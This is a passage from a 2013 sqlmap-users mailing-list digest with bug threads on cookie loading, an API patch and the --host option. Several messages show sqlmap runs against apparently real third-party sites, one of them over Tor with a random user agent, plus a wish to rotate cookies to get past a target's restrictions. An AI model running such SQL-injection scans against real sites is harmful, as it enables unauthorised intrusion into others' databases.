>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>>
>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 3
>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Dirk Wetter <sp...@dr...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Dirk.
>>>
>>> Now that crash should be "patched".
>>>
>>> Could you please retry it now and say if the latest revision suits your
>>> needs?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>>>
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized"
>>> > now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> > hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> > Traceback (most recent call last):
>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> > _really_load
>>> > assert domain_specified == initial_dot
>>> > AssertionError
>>> >
>>> > _warn_unhandled_exception()
>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>> ('invalid
>>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> >
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>> >
>>> > the 999.. looks strange to me.
>>> >
>>> > >
>>> > >
>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> > mir...@gm... <mailto:mir...@gm...>> wrote:
>>> > >
>>> > > Hi Dirk.
>>> > >
>>> > > Well, I would say that you have an expired cookie. Do you see that
>>> > value 0? That value should be a valid UNIX time representing time of
>>> cookie
>>> > expiration. Also, I've just tested that cookie of yours and sqlmap
>>> says:
>>> > "[WARNING] cookie '....' has expired"
>>> > >
>>> >
>>> > that's true but IMO 0 represents just a session cookie. Example:
>>> >
>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>> > --save-cookies=/dev/stdout bing.com
>>> > # HTTP cookie file.
>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>> > # Edit at your own risk.
>>> >
>>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>> > AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> > .bing.com TRUE / FALSE 1429089794 SRCHD
>>> > D=2781203&MS=2781203&AF=NOFORM
>>> > .bing.com TRUE / FALSE 1429089794 OrigMUID
>>> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> > .bing.com TRUE / FALSE 1429089794 MUID
>>> > 333995A69E06630B2EB491169F016314
>>> > .bing.com TRUE / FALSE 0 _SS
>>> > SID=B954CB7EDF8643CABAD8013F27A241E7
>>> > .bing.com TRUE / FALSE 0 _HOP
>>> > .bing.com TRUE / FALSE 0 _FS NU=1
>>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> > www.bing.com FALSE / FALSE 1429089794 MUIDB
>>> > 333995A69E06630B2EB491169F016314
>>> >
>>> > prompt%
>>> >
>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix
>>> > time instead of 0 in there.
>>> >
>>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>> > but cookies w/ expiration date) and uses the last
>>> > cookie only for the first 120 tries.
>>> >
>>> > Cheers, Dirk
>>> >
>>> >
>>> > >
>>> > > Kind regards,
>>> > > Miroslav Stampar
>>> > >
>>> > >
>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
>>> <mailto:
>>> > sp...@dr...>> wrote:
>>> > >
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > thx for your prompt answer.
>>> > >
>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > > Hi Dirk.
>>> > > >
>>> > > > Could you please get the latest revision and retry it again?
>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>> > only this one.
>>> > > The slight difference seems to be that in the case where I
>>> > didn't supply a cookie
>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from
>>> > the server anymore.
>>> > > >
>>> > > > There was a situation where info messages have been wrongly
>>> > written that original response contained Set-Cookie in situations like
>>> > yours.
>>> > > >
>>> > > > In case that everything stays as it is, I'll need to ask you
>>> > to provide more details. For example, cookie file would be great.
>>> > >
>>> > > sure, here you go:
>>> > >
>>> > > --snip
>>> > > # Netscape HTTP Cookie File
>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
>>> > \t <Cookie>
>>> > > [..]
>>> > > --snap
>>> > >
>>> > > They are all session cookies. For easier reading here I put some
>>> > blanks in the line
>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>> > generated with
>>> > > stompy and a shell script (looks he same as with
>>> > > wget -S -O /dev/null --keep-session-cookies
>>> > --save-cookies=<file> <URL>)
>>> > >
>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies
>>> > file ;-)
>>> > >
>>> > > >
>>> > > > Also, please make sure that the cookie file contains proper
>>> > cookie(s) - domain name should be the same as a domain of target,
>>> cookie
>>> > needs to have a proper valid time, etc.
>>> > >
>>> > > see above.
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
>>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>>> <mailto:
>>> > sp...@dr...>>> wrote:
>>> > > >
>>> > > > Hi Miroslav,
>>> > > >
>>> > > > yes unfortunately.
>>> > > >
>>> > > > If I omit the cookie line in the request header
>>> > completely, sqlmap
>>> > > > seems to take the first cookie issued by the server with
>>> > set-cookie (and
>>> > > > put's it silently in).
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > > Hi.
>>> > > > >
>>> > > > > And this is also happening if you are skipping "Cookie:
>>> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > > >
>>> > > > > Kind regards,
>>> > > > > Miroslav Stampar
>>> > > > >
>>> > > > >
>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
>>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>>> <mailto:
>>> > sp...@dr...>> <mailto:sp...@dr... <mailto:
>>> sp...@dr...>
>>> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > > >
>>> > > > >
>>> > > > > Hi folks,
>>> > > > >
>>> > > > > .... that doesn't work for me. It always uses the
>>> > cookie supplied
>>> > > > > (below in $REQUEST, or if I omit the line in
>>> > $REQUEST the one
>>> > > > > from the 1st server reply is being used)
>>> > > > >
>>> > > > > So what is wrong in here:
>>> > > > >
>>> > > > > cd
>>> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > > --level=2 --risk=2 -r $REQUEST
>>> > > > >
>>> > > > > The content of the file $REQUEST is:
>>> > > > >
>>> > > > > POST <URL> HTTP/1.1
>>> > > > > Host: <HOST>
>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
>>> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <
>>> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>> > > > > Accept:
>>> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > > Accept-Language: en-US,en;q=0.5
>>> > > > > Accept-Encoding: gzip, deflate
>>> > > > > Referer: <Referer>
>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > > Connection: keep-alive
>>> > > > > Content-Type: application/x-www-form-urlencoded
>>> > > > > Content-Length: 67
>>> > > > >
>>> > > > > <abunchofpostparams>
>>> > > > >
>>> > > > >
>>> > > > > No hints that cookie-file is not in correct format
>>> > (I've been through this,
>>> > > > > at least I think I so ;) ).
>>> > > > >
>>> > > > > Any insight would be much appreciated.
>>> > > > >
>>> > > > >
>>> > > > > Cheers,
>>> > > > >
>>> > > > > Dirk
>>> > > > >
>>> > > > >
>>> > > > >
>>> >
>>> ------------------------------------------------------------------------------
>>> > > > > Precog is a next-generation analytics platform
>>> > capable of advanced
>>> > > > > analytics on semi-structured data. The platform
>>> > includes APIs for building
>>> > > > > apps and a phenomenal toolset for data science.
>>> > Developers can use
>>> > > > > our toolset for easy data analysis & visualization.
>>> > Get a free account!
>>> > > > >
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > > _______________________________________________
>>> > > > > sqlmap-users mailing list
>>> > > > > sql...@li... <mailto:
>>> > sql...@li...> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...>> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...>>>
>>> > > > >
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > > --
>>> > > > > Miroslav Stampar
>>> > > > > http://about.me/stamparm
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 4
>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>>> clean_filesystem
>>> To: Brandon Perry <bpe...@gm...>
>>> Cc: sqlmap users <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Brandon.
>>>
>>> Thank you for your patch and find it now included [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>
>>>
>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <
>>> bpe...@gm...>wrote:
>>>
>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>>> api
>>> > call when self.output_directory is NoneType and clean_system() is
>>> called.
>>> >
>>> > --
>>> > http://volatile-minds.blogspot.com -- blog
>>> > http://www.volatileminds.net -- website
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>> >
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 5
>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>> Hi Miroslav,
>>>
>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>> > Hi Dirk.
>>> >
>>> > Now that crash should be "patched".
>>> >
>>> > Could you please retry it now and say if the latest revision suits
>>> your needs?
>>>
>>> cool, thx. Works!
>>>
>>> However (sorry):
>>>
>>> One needs to omit the cookie in the request header, otherwise it just
>>> uses the one
>>> supplied by the request.
>>>
>>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>>> correctly
>>> but my point was using the load-cookies option to direct sqlmap to change
>>> cookies once in a while (whenever that's gonna be). This is to circumvent
>>> restrictions one can encounter otherwise....
>>>
>>> Cheers,
>>>
>>> Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> > Traceback (most recent call last):
>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> _really_load
>>> > assert domain_specified == initial_dot
>>> > AssertionError
>>> >
>>> > _warn_unhandled_exception()
>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>> >
>>> > the 999.. looks strange to me.
>>> >
>>> > >
>>> > >
>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> mir...@gm... <mailto:mir...@gm...> <mailto:
>>> mir...@gm... <mailto:mir...@gm...>>> wrote:
>>> > >
>>> > > Hi Dirk.
>>> > >
>>> > > Well, I would say that you have an expired cookie. Do you see that
>>> value 0? That value should be a valid UNIX time representing time of cookie
>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>> "[WARNING] cookie '....' has expired"
>>> > >
>>> >
>>> > that's true but IMO 0 represents just a session cookie. Example:
>>> >
>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>> --save-cookies=/dev/stdout bing.com <http://bing.com>
>>> > # HTTP cookie file.
>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>> > # Edit at your own risk.
>>> >
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR
>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD
>>> D=2781203&MS=2781203&AF=NOFORM
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID
>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID
>>> 333995A69E06630B2EB491169F016314
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _SS
>>> SID=B954CB7EDF8643CABAD8013F27A241E7
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _HOP
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1
>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID
>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB
>>> 333995A69E06630B2EB491169F016314
>>> >
>>> > prompt%
>>> >
>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix time instead of 0 in there.
>>> >
>>> > Ok: With the prev rev ed5599f it reads this file ok (no session
>>> cookies but cookies w/ expiration date) and uses the last
>>> > cookie only for the first 120 tries.
>>> >
>>> > Cheers, Dirk
>>> >
>>> >
>>> > >
>>> > > Kind regards,
>>> > > Miroslav Stampar
>>> > >
>>> > >
>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>> wrote:
>>> > >
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > thx for your prompt answer.
>>> > >
>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > > Hi Dirk.
>>> > > >
>>> > > > Could you please get the latest revision and retry it again?
>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>> only this one.
>>> > > The slight difference seems to be that in the case where I didn't
>>> supply a cookie
>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>> server anymore.
>>> > > >
>>> > > > There was a situation where info messages have been wrongly
>>> written that original response contained Set-Cookie in situations like
>>> yours.
>>> > > >
>>> > > > In case that everything stays as it is, I'll need to ask you to
>>> provide more details. For example, cookie file would be great.
>>> > >
>>> > > sure, here you go:
>>> > >
>>> > > --snip
>>> > > # Netscape HTTP Cookie File
>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > > [..]
>>> > > --snap
>>> > >
>>> > > They are all session cookies. For easier reading here I put some
>>> blanks in the line
>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>> generated with
>>> > > stompy and a shell script (looks he same as with
>>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>> <URL>)
>>> > >
>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file
>>> ;-)
>>> > >
>>> > > >
>>> > > > Also, please make sure that the cookie file contains proper
>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>> needs to have a proper valid time, etc.
>>> > >
>>> > > see above.
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > >
>>> > > > Hi Miroslav,
>>> > > >
>>> > > > yes unfortunately.
>>> > > >
>>> > > > If I omit the cookie line in the request header completely, sqlmap
>>> > > > seems to take the first cookie issued by the server with
>>> set-cookie (and
>>> > > > put's it silently in).
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > > Hi.
>>> > > > >
>>> > > > > And this is also happening if you are skipping "Cookie:
>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > > >
>>> > > > > Kind regards,
>>> > > > > Miroslav Stampar
>>> > > > >
>>> > > > >
>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>>> > > > >
>>> > > > >
>>> > > > > Hi folks,
>>> > > > >
>>> > > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > > from the 1st server reply is being used)
>>> > > > >
>>> > > > > So what is wrong in here:
>>> > > > >
>>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > > --level=2 --risk=2 -r $REQUEST
>>> > > > >
>>> > > > > The content of the file $REQUEST is:
>>> > > > >
>>> > > > > POST <URL> HTTP/1.1
>>> > > > > Host: <HOST>
>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>> > > > > Accept:
>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > > Accept-Language: en-US,en;q=0.5
>>> > > > > Accept-Encoding: gzip, deflate
>>> > > > > Referer: <Referer>
>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > > Connection: keep-alive
>>> > > > > Content-Type: application/x-www-form-urlencoded
>>> > > > > Content-Length: 67
>>> > > > >
>>> > > > > <abunchofpostparams>
>>> > > > >
>>> > > > >
>>> > > > > No hints that cookie-file is not in correct format (I've been
>>> through this,
>>> > > > > at least I think I so ;) ).
>>> > > > >
>>> > > > > Any insight would be much appreciated.
>>> > > > >
>>> > > > >
>>> > > > > Cheers,
>>> > > > >
>>> > > > > Dirk
>>> > > > >
>>> > > > >
>>> > > > >
>>> ------------------------------------------------------------------------------
>>> > > > > Precog is a next-generation analytics platform capable of
>>> advanced
>>> > > > > analytics on semi-structured data. The platform includes APIs
>>> for building
>>> > > > > apps and a phenomenal toolset for data science. Developers can
>>> use
>>> > > > > our toolset for easy data analysis & visualization. Get a free
>>> account!
>>> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > > _______________________________________________
>>> > > > > sqlmap-users mailing list
>>> > > > > sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>>>
>>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > > --
>>> > > > > Miroslav Stampar
>>> > > > > http://about.me/stamparm
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 6
>>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>>> From: <co...@5i...>
>>> Subject: [sqlmap-users] --host parameter
>>> To: sql...@li...
>>> Message-ID:
>>> <
>>> 201...@em...
>>> >
>>>
>>> Content-Type: text/plain; charset="utf-8"
>>>
>>> Hello,
>>> the --host doesn't work as expected, or I am doing something wrong:
>>>
>>>
>>> this works as expected:
>>>
>>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:57:15
>>>
>>> [23:57:15] [INFO] testing connection to the target URL
>>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>> [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>> couple of seconds
>>> [23:57:16] [INFO] target URL is stable
>>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>> might be injectable (possible DBMS: 'MySQL')
>>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>
>>>
>>> ....
>>>
>>>
>>> this doesn't work as expected:
>>>
>>> ./sqlmap.py --host='i.csland.ro'
>>> --url='http://188.240.236.15/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:58:03
>>>
>>> [23:58:03] [INFO] testing connection to the target URL
>>> [23:58:03] [CRITICAL] page not found (404)
>>> it is not recommended to continue in this kind of cases. Do you want to
>>> quit and make sure that everything is set up properly? [Y/n]
>>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>>
>>> ............
>>>
>>>
>>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>
>>> Thanks.
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 7
>>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>>> From: ???????? ?????? <vo...@s2...>
>>> Subject: [sqlmap-users] Sqlmap and direct connect error
>>> To: sql...@li...
>>> Message-ID: <C59...@s2...>
>>> Content-Type: text/plain; charset=us-ascii
>>>
>>> Hi!
>>>
>>> This bug detected if add direct param.
>>>
>>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> --exclude-sysdbs
>>>
>>>
>>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>> retry your run with the latest development version from the GitHub
>>> repository. If the exception persists, please send by e-mail to '
>>> sql...@li...' or open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any information required to reproduce the bug. The developers will
>>> try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev-de99717
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -d
>>> **************************************************** -u
>>> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> --exclude-sysdbs
>>> Technique: None
>>> Back-end DBMS: MySQL (identified)
>>> Traceback (most recent call last):
>>> File "sqlmap.py", line 87, in main
>>> start()
>>> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>> start
>>> action()
>>> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>> setHandler()
>>> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>> setHandler
>>> conf.dbmsConnector.connect()
>>> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
>>> connect
>>> self.connector = pymysql.connect(host=self.hostname, user=self.user,
>>> passwd=self.password, db=self.db, port=self.port,
>>> connect_timeout=conf.timeout, use_unicode=True)
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>>> line 93, in Connect
>>> return Connection(*args, **kwargs)
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> line 584, in __init__
>>> self._connect()
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> line 739, in _connect
>>> sock.connect((self.host, self.port))
>>> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>>> connect
